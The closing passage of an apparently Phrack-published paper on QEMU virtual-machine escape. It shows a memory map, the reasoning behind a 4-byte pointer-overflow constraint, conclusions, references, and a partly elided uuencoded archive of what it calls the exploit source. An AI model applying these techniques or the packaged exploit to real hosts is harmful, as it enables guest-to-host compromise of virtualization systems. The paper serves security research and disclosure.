55e5e4862000-55e5e48e3000 rw-p 00685000 fe:01 6940407 ...
55e5e48e3000-55e5e4d71000 rw-p 00000000 00:00 0
55e5e6156000-55e5e7931000 rw-p 00000000 00:00 0 [heap]
7fb80b4f5000-7fb80c000000 rw-p 00000000 00:00 0
7fb80c000000-7fb88c000000 rw-p 00000000 00:00 0 [2 GB of RAM]
7fb88c000000-7fb88c915000 rw-p 00000000 00:00 0
...
7fb89b6a0000-7fb89b6cb000 r-xp 00000000 fe:01 794385 [first shared lib]
7fb89b6cb000-7fb89b8cb000 ---p 0002b000 fe:01 794385 ...
7fb89b8cb000-7fb89b8cc000 r--p 0002b000 fe:01 794385 ...
7fb89b8cc000-7fb89b8cd000 rw-p 0002c000 fe:01 794385 ...
...
7ffd8f8f8000-7ffd8f91a000 rw-p 00000000 00:00 0 [stack]
7ffd8f970000-7ffd8f972000 r--p 00000000 00:00 0 [vvar]
7ffd8f972000-7ffd8f974000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
As a consequence, our 4-byte overflow is not sufficient to redirect the
irq pointer (originally pointing into the heap, somewhere at
0x55xxxxxxxxxx) so that it points to our fake IRQState structure (injected
somewhere at 0x7fxxxxxxxxxx).
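The constraint comes down to simple bit arithmetic: a 4-byte overwrite of a
little-endian 64-bit pointer replaces its low 32 bits and leaves the high
32 bits untouched. A small sketch with hypothetical helper names, using
addresses taken from the listings in this paper:

```c
#include <stdbool.h>
#include <stdint.h>

/* Result of overwriting only the low 4 bytes of a 64-bit pointer. */
uint64_t overwrite_low32(uint64_t original, uint32_t low)
{
    return (original & 0xffffffff00000000ULL) | low;
}

/* A target is reachable only if it shares the original's high 32 bits. */
bool reachable_with_low32(uint64_t original, uint64_t target)
{
    return (original >> 32) == (target >> 32);
}
```

Starting from a heap pointer such as 0x55e5e6156000, writing the low bytes
of 0x7fb6a8913000 yields 0x55e5a8913000, not the intended address. When
both addresses share the same upper half, as 0x7fb6c5795347 and
0x7fb6a8913000 do, the overwrite is sufficient.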
--[ 6 - Conclusions
In this paper, we have presented two exploits on QEMU's network device
emulators. The combination of these exploits makes it possible to break out
from a VM and execute code on the host.
During this work, we have probably crashed our testing VM more than one
thousand times. It was tedious to debug unsuccessful exploit attempts,
especially with a complex shellcode that spawns several threads and
processes. So we hope that we have provided sufficient technical details
and generic techniques that could be reused for further exploitation of
QEMU.
--[ 7 - Greets
We would like to thank Pierre-Sylvain Desse for his insightful comments.
Greets to coldshell, and Kevin Schouteeten for helping us to test on
various environments.
Thanks also to Nelson Elhage for his seminal work on VM-escape.
And a big thank you to the reviewers of the Phrack Staff for challenging
us to improve the paper and the code.
--[ 8 - References
[1] http://venom.crowdstrike.com
[2] http://media.blackhat.com/bh-us-11/Elhage/BH_US_11_Elhage_Virtunoid_WP.pdf
[3] https://github.com/nelhage/virtunoid/blob/master/virtunoid.c
[4] http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf
[5] https://www.kernel.org/doc/Documentation/vm/pagemap.txt
[6] https://blog.affien.com/archives/2005/07/15/reversing-crc/
--[ 9 - Source Code
begin 644 vm_escape.tar.gz
M'XL(`"[OTU@``^Q:Z7,:29;W5_%7Y*AC.L"-I<RJK*RJMML3"$H6801:0#ZV
M#R)/B6BN@<(M;4_OW[XO7R*!D+KMV)C>C8V=^B"*S'?^WI$OL3]-1W:EY<(>
...
M02=!*;-3D0)X,>]OQ7PYWY!]%-KW;>J&]`AST3.G!Z$:#["[*F_E,15$.]MU
MHN(3HCF-G_$S?L;/^!D_XV?\C)_Q,W[&S_@9/^-G_(R?\3-^QD_]^7_T`TH,
$`$`!````
`
end
|=[ EOF ]=---------------------------------------------------------------=|